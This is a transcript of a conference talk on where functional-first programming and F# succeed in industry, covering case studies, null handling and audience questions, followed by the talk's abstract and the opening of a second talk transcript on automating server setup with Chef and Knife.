doi
stringlengths 17
24
| transcript
stringlengths 305
148k
| abstract
stringlengths 5
6.38k
|
---|---|---|
10.5446/51411 (DOI)
|
Hi, welcome. Wow, that's the Scandinavian excitement. Okay, anyhow. I'm happy to be back here doing this talk and for those who have been here last year, I did a talk, I think with the same title like 12 months ago and I like to think of this as like a continuously deployed talk because I'm constantly changing it and adding stuff to it, removing stuff because we are learning, right? It's still in the dot net space at least, that's kind of a new technology. So 12 months ago, this wasn't even released. It was like three months before Microsoft released the API. So now today, we are three months before version two of the API. And the idea of this talk is basically to do a mixture of what do we have today and what will we get in three months. Okay, so I have a list of features that I want to show you that you know what's coming up and actually I want to skip some of the basics because you know, 60 minutes is not so much time. But if you go to Vimeo, there's the video from last year where you know, I basically talk about these things from the point of view from 12 months ago. Okay. Also very important, I think, is when you talk about web API security today, there is this thing called O of, yeah, this is protocol that is quite controversial right now. Since it's kind of hard to fit in all the framework stuff and the protocol into a single talk, I'm doing a separate O of talk later today at three o'clock in this room. So if you care about the gory details of this protocol and if you should use it or not, then come here three o'clock. Cool. So my name is Dominic. I guess the most important part here is he has my email address. If you have questions, you can write me an email or tweet me or whatever you want. So what are we going to do? We have a quick look at the HTTP security model and how we can implement that in web API. Then there's a new thing coming up in Microsoft's web stack called Owin, which is a hosting infrastructure that will be released in, you know, or is partially released already, but the full story will be done in three months time, which influences how you would do security in the future. We talk about the new web API pipeline, which gives you more options, how to do security, and then we talk about application scenarios. And basically, I want to take you on a journey from very simple applications that use web APIs to, you know, the way we build more complex systems and what are the challenges in between, how can web API help, and in the end, I'll show you something that shows how I can help. Good. So the big picture, um, is we are talking HTTP. Actually, we are talking HTTPS. So whenever we're doing security with web API, we have to use SSL. SSL is not optional. It's mandatory. Okay. That's for most security mechanisms we have today on HTTP. They rely on the transport protection. If you don't have transport protection, well, you shouldn't bother with all the login stuff. Yeah, right? You don't need it. Yeah. Everybody can read it on from your wire. The next thing which is kind of important is that Microsoft has split, even if it's called ASP.NET web API, it actually has nothing to do with ASP.NET. There are no common base class between the two frameworks. Yeah. So ASP.NET web API is hosting independent. You can take this thing and host it in an arbitrary process. Okay. And the host today is typically IIS. Or there's a self-host that ships with.NET or with MVC4. In MVC5, we will have a new host that has a number of interesting features. For example, that it's not bound anymore on running on.NET, for example. You can run it on mono, at least using the infrastructure that they provide. So that's kind of an important split. Yeah, because web API is just a bunch of classes which make up a framework and they can be hosted, which is different to ASP.NET, which was always kind of tightly bound to IIS. So let's start with this. I said it is very, very important that you always, always, always use SSL, right? And developers in SSL, they have sometimes have this love-hate relationship, yeah? These pesky exceptions throwing up, can't establish secure TLS channel, things like that. So I thought, let's ask Google, yeah? How to help me? How to handle SSL validation errors? And that's what I got back. Yeah, so you get plenty of guidance how to ignore SSL validation, but not so much guidance on how to do it correctly, okay? And especially with the new application architectures we are moving to, yeah? Web API, web APIs are perfect backends for mobile applications, right? So you are using them outside of the secure, you know, boundaries of your intranet where an admin actually controls all that stuff. So you're sitting in, you know, at the airport and, you know, accessing company resources, yeah? The guy next, or next table might be doing a middle attack against you, giving you a fake certificate and your app might never even notice why, well, because you ignored SSL certificate validation because, you know, that seems to be the popular thing, okay? So don't do that, okay? That's the thing I want to get out of the way here. For all the.NET developers out there, it's a class called service point manager. If you find that in your code like with full text search, there's something wrong. So the security model is really, really simple in HTTP, right? So we are sending everything in clear text over the wire. SSL protects, you know, from eavesdropping, replay attacks, gives us server authentication, integrity and that stuff. And whatever a server says, hey, you are not authorized to do that, you have to authenticate, it sends us back a 401, typically with a.dap,.dap authenticate header which tells us how we can authenticate, yeah? For example, basic, yeah? When you get back a scheme of basic here that the browser knows how to pop up a dialog box and you can, you know, type in your credentials, yeah? When you have typed in the credentials, the browser, if we use that as a client, will resend the request, yeah? And this time, put the credential on the authorization header and use the same scheme that came back earlier from the server. So they said, okay, I'm using now the basic scheme, that's the credentials, now, you know, I retransmit the data. And how that is done, well, as I said, typically it's the authorization header but there are other means like query strings, you know, don't use query strings, by the way, cookies are another typical thing how you transmit credentials. Now, how can we implement authentication in, in web API and authorization as well? And if you look at the documentation today, you will see this picture and that's the link where you can find that. So Microsoft has basically divided their pipeline into two parts, authentication which happens first, early, and authorization and afterwards the actual business logic which is in the controller. Now, when you want to do authentication today in web API, you have two choices and none of them are perfect, yeah? So one is you are writing an HTTP module, okay? That is an IIS extensibility point. The, I guess the advantage of that is it's a kind of a simple to use programming model. The disadvantage is you are bound to IIS. I said, web API is hosting independent. So what about now I want to take my web API and want to host it as an anti-service? Yeah, you are bound to IIS because you have host-specific investments, yeah? So the answer was, okay, if you want to do that, write a so-called HTTP message handler. And that is kind of a low-level interface in web API that gets to see all requests or responses, allows you to validate credentials, send back these status codes and headers and all these things. But you had something which is web API-specific, okay? And then there was the authorization filter. Basically, they called after authentication has happened, they called the authorization filter and that makes sure that the user has certain, you know, properties, claims that allow him to actually access the business logic. And again, the model wasn't perfect because you started implementing authentication as message handlers. There was a bit of an ordering issue. It wasn't really clear that when you add multiple handlers to a web API in which order they run or at least if multiple people add to that pipeline, for example. So it would have been nice if there would be a separate stage between message handlers and authorization filters that are specific for authentication. And Microsoft took that feedback and actually changed that. So first of all, the whole hosting thing has changed. As I said, the new hosting infrastructure that will be used by default with web API version two but is already used today by Signal R is called O-Win. It's the open, can't remember, open is the key. And the interesting thing is now that Microsoft, this O-Win thing is basically a specification how to tie together frameworks and hosts, okay? So that they can happily live together in the same process. And a number of open source frameworks are also using O-Win right now already or will use it in the future like Nancy, Fubu, ServiceSec and so on, which means that in the future you will be able to run all these things in a single process kind of keying off the same routing table almost. Yeah, you can select slash API goes to web API, slash disk goes to NancyFX, slash something will be your signal R hub to do the full duplex communication and so on. And for security, what that means is if you want to write authentication logic that needs to run across all these frameworks, you have to use the O-Win specific extensibility points, okay? And Microsoft will ship a bunch of them in the next version for JSON web tokens which I guess is the most important one, forms of authentication, Twitter, LiveID, Google, Facebook. So they are feature parity with what they have in MVC4 right now with this.NET OpenOff social logins. So they will reimplement all these things without.NET OpenOff from scratch as O-Win middleware and basically meaning Microsoft donates kind of all that code so all the frameworks you are seeing on that page can use it and your framework as well if you are in the framework business, you set up your stuff on O-Win, you will get this all for free, okay? So just to give you an idea how that new pipeline looks like, you see we have the host which is now O-Win, doesn't matter if it's IIS or something else, they use the same O-Win pipeline regardless of the host in the future and here you would implement a hosting framework independent cross cutting concerns like authentication, okay? Then when we transition into the web API we have message handlers which are still there which you still can use if you have existing code for message handlers, just reuse it, it will work, okay? The other new thing they added is before they actually run the authorization filters there is now an authentication filter. So the idea is now that in the future you will use message handlers for cross cutting concerns which are not necessarily security related, yeah? Like you want to inspect messages, maybe transformation, media type format is run in this early stage for example, yeah? So connect. If you want to do web API specific authentication write an authentication filter, if you want to do web API independent authentication write an O-Win middleware, okay? It's about choices I guess. So, oh, and just to make it clear as I guess can imagine the more you are on that side of the world the more generic your code will look like obviously because you need the right code that works with arbitrary frameworks. The more you move to that side of the world the closer you are to your business logic and the more you can, you know, write very specific code, yeah? So it depends really what you want, yeah? Just to give you an idea that's how middleware looks like in O-Win. As I said it's a kind of an abstraction, okay? Has anyone done Node.js in the room? So there's this concept of middleware, it's a pipeline. Basically you chain together functions, okay? And you call one function, it does its work and then it calls the next function, yeah? It's like the 8-bit pipeline just a little bit more down to earth. And just to give you an idea basically that's how they abstract the way HTTP. It's an addiction-navial string object, okay? In there you have things like verbs and URLs and headers and all that stuff, yeah? And then you work on that level and for example if you would authenticate someone you would look for the authorization header, you would pull out the credential, you would run your credential specific logic and if you are happy you would set the principle on another key in that environment dictionary and at some point there's other middleware who will take that and pick it up and move it to web API, okay? So just to give you an idea how low level that is but if you are in that business that you have to support multiple frameworks then you can work on that level. The traditional one was the message handler level. Again equally low level but you already have, you know,.NET objects here, HTTP request message and HTTP response message. So you're working at a slightly higher level here. And the idea was you get the request, you do whatever you want like authentication, you generate the response and you return it, okay? And I have a pretty popular framework out there called Think Textual Identity Model which does exactly that. It has a thing called the authentication handler which derives from delegating handler and it knows how to pass headers and query strings and cookies and client certificates and all that stuff and maps it to validation logic and then it does the authentication for you, the claims transformation, the session handling and setting the principle. So if that's all you need, that'll work today, that'll work tomorrow, O-Win is the version next thing, okay? So the other new thing that we'll have in that API is the authentication filter and you see now that we are so late in the pipeline now that we can have this semantics here. I can decorate controllers and action methods with attributes saying this controller needs this authentication method, that controller needs that authentication method. You can even go as granular as saying this action method needs that authentication, that's the delete method needs the client certificate, for example, yeah? So depending on your needs, you can go from very generic to very granular in the future or today as well but this stuff is new stuff, okay? So now that's authentication, yeah? The next thing that's happening afterwards after the user is authenticated, we have authorization and that nothing has changed here really. We have the authorized attribute, just putting it on something means the user has to be authenticated somehow, okay? We don't care too much how. You have to allow anonymous attribute where you can override this here saying like, okay, the whole controller needs authentication but this method here allows anonymous access, for example. And you can further specify it like saying this action here requires that the user is in a role called foo, yeah? And for everyone who knows me, I would say never ever do that, okay? Because what you're doing here is you're tightly coupling your business logic with security logic, yeah? And whenever the requirements change, who can call the delete method here, you will have to change your code, have to retest it, redeploy, you know, all that stuff. What you should do is rather abstract the way the security logic to move it out of the actual business code and that's what you do basically by deriving from the authorized attribute and implementing the is authorized method and implement your custom security logic inside of there so you have it out of your business logic. And typically you would do that in a separate assembly, meaning when the security logic changes, you can just update your logic in the attribute and redeploy that assembly but not the rest of the application, okay? And that's basically how I implement what I call claims-based authorization. That's another thing from FinTech identity model and what this basically does is it gets rid of all of the security information in the business logic itself. It just says, hey, you know what? This method here put which returns a customer, this updates customers, okay? And whenever someone calls that operation, I will call a separate authorization logic which says, hey, here's this guy with these claims, he's trying to update a customer. Is he allowed to do that? Yes or no? Okay? So what you do is you actually describe what the method is doing and not telling them who is allowed to call it, right? These are two separate concerns and I think you should model your APIs like that as well, okay? Questions so far? That's the pipeline, okay? Authentication host, authentication of API, authorization, business logic. And now we can build stuff on top of that. So we divide applications today, I guess roughly in two big, you know, buckets, yeah? Same domain and cross domain. Same domain means that the caller of the web API lives in the same domain as the web API itself. And that is very typically like, you know, an application, you render a page, this page does an HX style callback back to its own application with some web API, maybe doing some validation, maybe fetching data, you know, the cool kids call that spa today. Single page application and even if you might have more than one page. There's one issue which we have to think about when doing HX style or same domain applications called C-Serve attacks, okay? So but the idea is this, you are going to an application, you log in like forms of indication, for example, yeah? You go to a page, the page does a callback to a web API in the same application and the cookie that was set by forms of indication just flows back and forth now, meaning you are implicitly authenticated in the web API as well, okay? Let me quickly show you that. Here's a page which I have implemented, wow, the projector has a problem. So I was talking that on that side, it's better. So you see basically what this page is doing, it iterates over the identity, over the claims of the user and spits it out to a client browser. And the way I do that on that page is classic MVC style, I pass in the claims as a model into the view and I'm just rendering out the model here on the server, okay? The same thing, the same page here, just doing the client side approach would be this, there's no model here, yeah? And I'm actually from my page calling a web API here that returns the identity of the user, okay? Same idea, one is server rendered, the other one is using JavaScript to get the data while the page is being rendered on the client side. And the point being here is both pages should return the same results because it shouldn't make a difference from your application point of view if you're doing it server side or client side once as long as you stay in the same domain, okay? Oops. Let's run it. So I guess I have to move that also to the other side. Okay, can we see that? Yeah. Okay, so when I say identity server, this is using the server rendering version, yeah? So I have to log it. And here we are, we have two claims, my name and something I added like locally. So when I go now to the client here, what you should see is the same thing, it's just a little bit different. First the page renders and then the data will come because I'm doing the HX callback, okay? So in other words, this is like the it just works scenario, okay? But there is one issue here and that's called cross-site request forgery. When the application sends down that forms of indication cookie, yeah, it will happily send it back every time I'm doing a request to that same domain. That's how cookies work, yeah? But it also means, yeah, if I'm serving to a different site, yeah, or in a different process, yeah? And this website makes a request to my application I've been authenticated with already, the browser will send that cookie along as well. Okay, so when I, let's do this. On this other tab, yeah, I haven't authenticated, yeah? I'm accessing the web API directly. You see that? I'm authenticated. Okay? So in other words, you don't want that, okay? You don't want that some application from ChinaHackshack.com, yeah? Render some script on your browser which access another site where you are potentially authenticated and can impersonate you, okay? So you have to protect against that. And that is called NTCServe. Yeah? That's the problem. We go to the app, we authenticate, we get a cookie. Now we're going to an evil app that makes requests to the same application, we send you authentication cookie, okay? Now Microsoft has something built in. It's not part of the framework, but it's part of the Spark template in MVC4 and it's called the validate HTTP entry for token attribute, yeah? And what this thing is doing is basically this, yeah? So when you go to the application and it renders down the form which has all the JavaScript on it and so on, what they do is they render two additional things. One is a cookie which has a random or not a random number, but something that is cryptographically derived from something on the server, okay? But it has a so-called anti-fottery cookie that is rendered down and the form has an anti-fottery token as a hidden field, okay? And now and whenever you are doing a post back to that page, oops, you are basically posting back the cookie as well as the hidden field. And on the server, what this attribute is doing, it takes the cookie value, it takes the hidden field value, does some math on that and makes sure that they are coming from me, actually. And if that's not the case, it will reject the request, okay? And for web API requests, what you would send is, you would send the cookie as well and you would put that value of that hidden field as an HTTP header on your HX call. And again, when we come back to the application, what this attribute is doing is, it looks at the cookie, it looks at the header on your HX call, runs some math on that if they don't match, reject the request, okay? So in other words, the second tab doesn't know the cookie, but it doesn't know the hidden field on that form. So it can't send both, okay? And if you want to see that in action, just go to Visual Studio and create an empty Spark application and you will see that on the API controllers, you will have that attribute and it's like the source code is part of the template so you can have a look how it works and so on. But my point being here is, if you're building that type of applications, C serve is definitely a concern, okay? So protect yourself against that. Good. Questions on that? Okay. Now, I guess the much, much more interesting and more common applications you will build are so-called cross-domain applications, yeah? So even if you're, maybe your Spark application is same domain today, maybe at some point, because of the load on it, you want to separate the front end and the back end to different servers and then suddenly you're doing cross-domain calls, okay? And the whole cookie thing won't work anyways, so prepare for that. But the whole idea is cross-domain applications, they live in separate domains. One domain is here, one domain is there and that might be, you know, a browser, that might be a native application, that might be something and you have a different server where the web APIs live, okay? And suddenly you are in a whole new world of security scenarios. So you have to think about authentication because cookies don't cut it anymore, yeah? You have something called cause, which I will show you and what you ultimately want to do is doing something called token-based authentication and the next version of web API makes that much, much easier. Okay. So we have to authenticate our user somehow, right? And I guess the thing that, you know, is there forever works kind of, is called shared secret authentication, in other words, the client and the server share a secret and the client sends the secret to the server and if that secret matches with the database, he proves that he knows that secret. They're also called passwords, okay? That's, I guess, you know, that works. But there are some issues with that, yeah? For example, you always have to send that credential on the wire. Obviously, it's protected by SSL and so on, but the much bigger problem is that the password needs to be in the memory of the client for the whole session, okay? So you basically need to open that application, you type in your password and the client needs to hold on to the password as long as you're talking to the server, okay? And I mean, thinking of mobile applications, how much do users like to type in their 12 character password every time they start the application? So what do you do then? Store it on the client device in clear text? Because, you know, mobile devices don't have that much crypto. So yeah, you can do it, but it's not very, you know, it's kind of old school, yeah? Slightly better from a security point of view as so-called shared signatures, where you have like a shared key and the client signs the HTTP request, sends the request and the server signs it as well and makes sure that the signatures match, okay? And if you are able to sign the request with that secret, you have proved you know the secret, yeah? And one popular open source library for doing that is called Hock. Hock is from the guy that originally created OAuth 2. He left the whole committee and I will talk about that in detail later on, but one thing is what he did afterwards, he created this shared signature authentication mechanism called Hock, yeah? I mean, you have the same problems. You have to store that secret on the client, yeah? That might be okay for maybe company machines. That might be not so okay for tablets or for mobile devices or whenever you generally have limited trust in the security of the device the client is running on. Yeah. What you really want to do, obviously because you are here in my talk, is token based authentication, yeah? And the idea is so much better, yeah? The client has a password for example or some sort of secret. He goes to a token service. He gives him the token service. He gets back a token in return in exchange. The client can forget that secret from that point on, yeah? Erase memory. It's never been seen here, okay? And from that point on, we use the token to authenticate with the web API, okay? And the way this works on HTTP is basically you put that token on the authorization header and a very common scheme is just saying bearer and again what bearer exactly means come to my talk at three o'clock. Now this might be a steep curve for some people because you need basically a separate token service infrastructure. This thing must be highly available obviously because if this thing goes down, all web APIs go down and sit behind it and rely on the token issuing mechanism. So what I have since I think last year already and what web API will have in the next version is a built-in token endpoint. Basically, we're taking this token service and moving it into the web API itself. So when you want to get started with token-based authentication, you don't need that infrastructure to start with but you have the same semantics. You're calling first the token service that's built into the API, get a token, forget about the secret and use the token from that point on. And that token could be a long list token for example saying it's valid for one week. So users only have to type in their password once a week. Google does it every two weeks for example. So the idea is this, you are going to a special endpoint here slash token typically, you authenticate, you get back a token and now you use the token to authenticate. I'll show you my implementation as I said in the next version of that API it's built in. So let's run fitler and let's open this. And I guess again I have to move it here. So what you're seeing here is first I'm making a round trip to the service, authenticate and get back to this long string. That's the session token. Okay. And from that point on I'm using session token to call the service and again what the service is doing is it's just echoing back my identity information. Okay. So let's press F12 here. So you see the first request, how much does that? Like this. You see the first request goes to the token endpoint. I'm authenticating here and, hold on. Yeah. And here we get back this access token. It's basically a JSON data structure which has two values access token and expires. And from that point on we just use the access token. So from here on I'm making the real calls to the business logic and you can see that we're using the session or the access token. From that point on my client doesn't need to know the password anymore. And I don't need to store it anymore on the client device which is I guess an important message here. Okay. Make sense? Good. I probably don't have the time but just recently I saw a presentation at the beach. So make sense? Okay. Okay. Now that was a C sharp client. Okay. Now let's do exactly the same thing in JavaScript to show you another interesting problem. So let's actually do this open the network thing here. So this is basically the moral equivalent of the C sharp client I just wrote. Okay. It's basically something that's a credential to the server getting back a session token and tries to use the session token afterwards. Yeah. So let's run that. Bang. It fails. Yeah. And what it does is it sends this options request here and this is basically a thing called course cross origin resource sharing. So this website tries to call a web API living in a different domain and browsers don't allow that. Okay. Otherwise you could do dangerous stuff. But given that this is kind of a popular scenario that you actually want to do that. Yeah. There's a specification for that called course which controls how you can do these cross origin call in the browser context. Okay. And when we look here at the console, what it actually says is local host is not allowed by access control. Okay. That means something has prevented to make the cross origin call. Yeah. And the way this works is this. Basically the JavaScript living in one domain tries to call the service in another domain. We what the browser is doing under the covers is first sending an options request saying, Hey, I have code here that tries to access you and it's coming from that origin and it tries to do a post. Are you cool with that? Yeah. And now the web API needs logic saying, do I allow requests from that domain? Yeah. And if he is cool with that, yeah, he says, okay, I allow that domain. I allow that method. I allow these headers and it's very granular what you can do here. And then afterwards the browser will do the actual request. If this here won't return or succeed, the browser will just stop here. That's the error you've just seen. Okay. Now the API version one doesn't include an implementation for course. That's again something we have implemented and there's a message handler, the course message handler. And obviously this is the demo mode configuration here. Yeah. All but what you can specify here things like I allow request server one, two and three, I allow post and put and I allow the accept content header, but not the, I don't know, whatever header. Yeah. So you can go very granular here and you know, just by enabling that, I can read the request. And now it actually worked. Okay. Because now there's a piece of code running in that API that understands the options request can evaluate it against the rules engine. So to speak and then send back the right response to that and allow that client access. So the good news here is that Microsoft liked our implementation so much that we are now moving into system.web with that. So basically they took our code. Yeah, thank you. Took our code and it's now system.web.course and actually all the credits go to Brock Allen, good friend of mine who did the actual implementation. Okay. And the way this works in the next is that you have a new attribute called enable course. You put it on the controller, say I allow these origins, these headers and these verbs. And that can be also stars in there if that's too granular for you. Yeah. But that's how it will work in the next version of the API. Okay. Move on. The next scenario that I'm seeing more and more and more in the last 12 months going to our clients is obviously you have architectures, way model things as a web API and you have many clients. Yeah. For example, server rendered.net clients, HTML5 JavaScript type of clients and obviously all these native clients running on different operating systems like desktop, mobile and so on. And obviously if your application gets that complex, then maybe the built in token endpoint doesn't cut it anymore, right? You need more control. You want to say like, well, this client gets access to these resources, that client gets access to different resources. Maybe this client needs to authenticate using a web browser. That client needs to authenticate using some different mechanism. So baking all that into your actual web API becomes a little bit of a maintenance problem. And that's where we factor out as always, we put a layer of abstraction in between and that's called the authorization server and that's actually a term from OAuth 2. And the idea is that you basically take all that logic, who is allowed to access what with which authentication method and blah, blah, blah, blah, blah and move that to a separate server and that takes care of it. Okay? And then basically the client goes first to the authorization server, requests the token, gets the token, access the web API. And that is actually covered by the OAuth 2 specification, which I will talk about in detail later on, yeah? But the whole idea is that you can come to an application architecture where you take a bunch of endpoints, a bunch of web APIs and group them together to something called an application. Okay? That is a logical grouping of endpoints and you define what type of resources are inside of that application. Yeah? Maybe your application is a user management application and you say, I can delete users, I can add users, I can, you know, add them to roles, I can search for them, blah, blah, blah, blah. Yeah? So basically you come up with your own domain specific things of what you can do in that application. Yeah? And now the OAuth protocol defines basically how a client can go to the authorization server and can ask for permissions. Yeah? I want to be able to search and read in that application. And now you can hang off rules and what you get back is an access token. And what the access token contains is basically who is the issuer, for which application is this token for, how long does it live, who is the user, who is the client and what are they in combination allowed to do in the application. Okay? That's your cost-claimed authorization and then inside your code you're doing your fine-claimed authorization going from there. Okay? Now the issue was that there is nothing built in or pre-built into.NET or, you know, or even products are not that common for that. So what I've been doing the last four weeks, I've been heads down basically implementing that stuff here. And what I want to do is I want to show it to you for the first time in public. Yeah? So bear with me. It might break. Yeah? But the whole idea is, let's do this, go here. You have this thing called Texture Authorization Server. And that goes hand in hand with, you know, Identity Server. So we don't only authorization here. We don't do authentication. Yeah? And basically what you can do is you can configure. That means I have to authenticate with some identity provider. That could be anything. Yeah? That could be, you know, Forms, Login, Google, Facebook, ADFS, Access Control Server, Windows, Azure, AD, whatever you want to connect to it. And then you have now this notion of an application. Okay? So we can create an application, give it a name, NDC, demo, give it some entry point in the URL namespace, NDC. That's the audience claim that will go in the token. So the recipient knows for whom this token is for. Yeah? We can give it some description. Can have a logo. Yeah? I can set a signing key. Do I want to do symmetric signatures, asymmetric signatures? I can specify other stuff like, do I want to require the user to give consent when the application asks for permission, stuff like that? And then I can save it. Okay? And now I can define scopes. So we have scopes here like your read scope. Yeah? And what? Scopes. Read. Oh, it's required. And the delete scope, for example, yeah? Delete. If something is really important for you, can emphasize it. So when the user clicks the, I allow that, he sees that emphasize on the screen, yeah? Saying, hey, that's something, you know, you should take pay attention to. And then you can per scope decide which of your clients will be allowed to request permission for that scope. Yeah? So maybe your corporate internet application can request delete permissions, but your iOS app can't, for example. Okay? So basically you can hang off permissions from there. And you can also define clients. Yeah? You can add a new client. You can tell which O of flow are they allowed to use. If they are using something that requires, you know, a callback, you can register the redirect you arise, you can call them back. So it allows you to pretty tightly lock down what this thing is doing. And now let me show you how it looks like in action. So let's run an application here called flows and O of defined so called flows that that's basically an orchestration how clients can request tokens. And again, for the gory detail come later to my talk. But one flow is the so called code flow. And that's for that application client. So this is a web application. It needs to talk to a web API on behalf of the human that's sitting in front of the browser. Okay? So what it does is basically it it goes to the authorize server, the user signs in. And now based on the definitions you did in the UI, you get this constant screen here saying, Hey, this client here tries to access an application called user management and it request the read and the search permission. Do you want to allow that? Yeah. And that screen is optional. So if you're more like an intro style of stereo, you can turn it off that this is a silent consent if you want that. But if I press allow, I come back to the application get a so called authorization code can exchange that code with an access token. And now with this access token, the application can actually call the web API. Okay? And it can store the access token. And this access token can be renewed. I think called refresh tokens. And again, we'll talk about that in a lot of detail later on. And at some point, the user decides he's not happy anymore that application accessing his data, it can go to kind of a self service portal, delete the access. And the next time the application tries to renew the token, it will fail. Okay? So that's how it looks like for web applications. If you're doing a client application, like a native application, for example, what you typically do is you open a web view. Yeah, so you're basically embedding a browser into a window in your application, which opens that constant screen, the user clicks yes. And then there's some communication going on between the web view and the client application to send back the token. And from that point on, the client application can access the token. Yeah. So when I do request token, I'm opening a web view here. And that's actually quite interesting. That's a new API in Windows 8, an operating system API that gives every application this feature of open and embedded web view. And that's kind of a special web view here because the calling application can't intercept keystrokes and stuff like that. And also it doesn't have access to cookies that are shared with desktop IE, for example. So when I sign in here, I see the same constant screen. This time I only ask for read. And by the way, I could even uncheck that here. And now the application has the token and can access the web API. And I'm just echoing back the claims here. Okay? For the last thing, I guess, is that you can do that all without user interaction. That is what comes closest to W's trust if you have done that in your past. Where basically the client itself has the credentials of the user and sends them to the authorization server and gets back a token in response. Okay? Without all the user interaction stuff. Yeah. And just to show you that this is actually used, yeah, so here is the Twitter application, which is opening a web view, right? And that's the constant screen. So I'm logging in here and say, authorize app. And from that point on, the Twitter client can access the Twitter data on my behalf. Okay? And the other approach, the one without the user interaction in the web view is done by Dropbox, where they collect the credentials directly, take these credentials, go to the authorization server, get back a token in response and use the token to access Dropbox. Okay? So that is really the pattern that you want to, that you want to prefer. Once your application is kind of in that category where you have many web APIs, many clients, users using different clients, maybe even throughout the day, you know, like, like maybe at daytime, they are in the intranet and taking like a corporate, officially blessed client application, yeah, which does all kinds of things. But on the road, they have their, you know, their mobile device with them where you have like a company deployed mobile application, which maybe has less access because, you know, just in case this thing gets stolen, we have some, you know, backup plan that, you know, you can't delete everything with that, whatever, yeah? Or maybe you have third parties building on top of open APIs that you are building, and then you can't control them in any way. But the way you can, you know, manage all that is by having the abstraction of an authorization server and application scopes and access tokens. Okay? And with that, you can, you know, kind of get a better handle on these kind of complex scenarios. Okay? So that's what I want to show you. You're seeing it here first. Actually, you know, like in a museum when you unveil a statue, I should do one last thing. I should do public. So here, settings, go to the scary part. And, oh, holy crap. I didn't test it, obviously, yeah? So where's GitHub? GitHub. Yeah, here we are. It's public, okay? So if you like that approach, thank you. If you like that approach, use it. It's in a very stage. And by the way, I also have written a little bit of documentation already, yeah? It's a little bit. Try it out. Give me feedback. There's an issue tracker. If you have ideas, you know, feature ideas, problems, whatever, give us feedback. And yeah, it's now public. We can shape this thing, okay? And I think it's tremendously useful for building these applications. Cool. So I guess to sum it up, we went from a very simple model from, you know, username passwords to having tokens instead, yeah? Having the authorization server inside the actual application to factoring out to a separate authorization server, to having a management system for these types of applications. You've seen C-Serve, which is something you should care about. My best advice is go away from cookie-based authentication. The next version of the Spark template in Visual Studio 2013 will be a Spark template without cookies. It will use the exact approach I just showed you, authorization server, over off flow, password in, token out, no cookies anymore, okay? So that's my advice. If you go cross domain, get friendly with course, yeah? You can't escape it if you are in the browser. And otherwise, yeah, think about your architecture in terms of access tokens. That helped me tremendously securing them once they got more complex and so on. Any questions? Yeah? That's being worked on right now, but nothing official yet. I can't say it's coming, but I think it's coming. Otherwise, it would be not too hard to write it yourself. If it's not coming, ping me, I will write it for you, okay? Okay, then thanks for your time and see you later, hopefully. Thank you.
|
Modeling web services using the HTTP API approach has become pretty much the standard approach. This also means that these APIs must be ready for all the security scenarios around identity and access control. These range from simple username/password and service to service communication, over enterprise integration to token based authentication and delegated authorization. In addition we also have to deal with different client types likes native desktop or mobile clients, browser clients and classic web applications. Dominick shows you how this all comes together.
|
10.5446/51413 (DOI)
|
Okay, everyone. Am I on? Hi, everyone. Thanks for coming along. It's my second talk here today. I started to kick off on the first technical session with technical talk. And it's just lovely to be in Oslo. Thanks for so many people coming along to this one. My name is Don Simon. I'm a FSHARP community contributor. And I also have a role as a principal researcher at Microsoft Research. And, yeah, today's talk, this talk is less technical than my first talk was. And it's really born out of a number of things. I've been working as part of the team bringing you sort of.NET language improvements, FSHARP as a language, a lot of improvements in C-Sharp and.NET as of the years as well. And I think as I've been working with people adopting improved programming language techniques, I think I've become a bit frustrated with how we talk about why these techniques actually matter in practice. We have a lot of language wars. We have a lot of arguments about why things are good or bad or what's the right way to do things technically. And we sometimes lose the big picture about why these things make a difference in industry. Now, we being perhaps the language designers, we being the people providing technologies in core teams, either at Microsoft or in the open source world, most of you work in industry and you know full well what a difference better language, better based technologies can make in practice and what harm they can inflict in practice as well when used incorrectly. So in many ways this should be reinforcing what a lot of you know intuitively with programming language techniques. But if you want technical talks from me like I normally give, then there's a whole lot of great FSHARP videos, most of them from other people, not from me, at FSHARP org slash videos, over 100 videos about FSHARP to watch there. If you want an overview of FSHARP 3.0 from Dustin Campbell at Microsoft at TechEd 2013, a wonderful talk he just gave there just last week and there's also the recording from session one today. So, but today I want to talk about the problem domains where FSHARP seems to work particularly well, where it seems to give particularly large advantages to companies adopting it in areas of data engineering, analytical programming, calculation engines and financial engineering and also general coding, but particularly the first four kinds of areas. And this is sort of focusing on how we can talk about a technology like FSHARP. It also applies to other what I'd call functional first programming languages, languages like OCaml to some extent, Scala to some extent aspects of CSHARP. And it's based on really a lot of informal observations of more than 30 successful FSHARP adoptions in industry and trying to bring out what, why does FSHARP succeed in some particular areas and what are the common themes we can bring out there. And concretely the talk comes from conversations I've had with a guy called Matt Harrington who works on the Microsoft DPE team who introduced me to a wonderful little book. How many people have read this book, Spin Selling? Ah, great. Are my recommendation or separately? Okay. It's an excellent book by Neil Rackham from the 1990s. It could probably be updated for the internet era, okay. But it comes from experiences at selling technical products, complex technical products as opposed to sort of how to close a sale if you're selling a vacuum cleaner or something like that, how to get that magic closing moment in a sale. It's not that kind of marketing book. It's a marketing book about like selling computer systems for IBM, for example. And how, how when you're, when you're talking about a complex product with a customer, how for instance there may be many decision makers involved in adopting a new major computer system. There are many decision makers involved in adopting a new programming technology in the sort of organizations we work in. And so we need to think differently about how we talk about these kind of technical products as we're, perhaps, than we normally do. So the marketing methodology is called Spin, which is quite fun. It's based around this situation, problem, implication, and need methodology. And I would recommend you take, take a, take a read of that. So let's talk about this through from the F-sharp perspective, from the functional first programming perspective. And we look at just generally at first, a name, look at some concrete case studies, and then look at how that maps through to the technical features of these kinds of, of, of languages. So the, the recurring business situation where, where we see, which we're looking at here is I lead a team developing online data processing components, financial modeling components, insurance calculation engines. I lead a team developing a trading platform, an algorithmic trading system, an online recommendation engine, a bioinformatics algorithm, sort of a disparate range of applications of programming. And let's try and simplify this and summarize that down to the situations where people are developing analytical components, data rich, data, data, data rich components. You can call them either of those. There's this kind of what I would characterize as two kinds of people, the analytical programmer and the data engineer. And often problem domains bring in one or both of those components. So that's the general situation where we are. So I always, sometimes when I talk about programming I like to do this split. We're very familiar with this kind of split in our, in our architectures. We have some coding in the middle where we have analytical programmers of some kind. We have data, data layers, data information and services. We have a lot of data engineering people over here. And then we have these people over here doing the, the, the front layer, the design presentation publication and UI. And so what are the, so we're not, so in this talk we're focusing on this situation over on the left more than over on the right. So what are the recurring business problems that people actually have in, when you talk through the actual business needs of these people, what, what are the problems that they are, what are they, are they, are they facing? The recurring ones we want to have top of our, in our mind of time to market for, time to deployment, time to market for the components. How fast they run is a key problem that people will talk about. Whether they're correct or not and whether they're actually able in some sense to do the software at all. Whether they're able to tackle the complexity of the problem domain with the programming tools that they have available. And these are related, I mean obviously time to 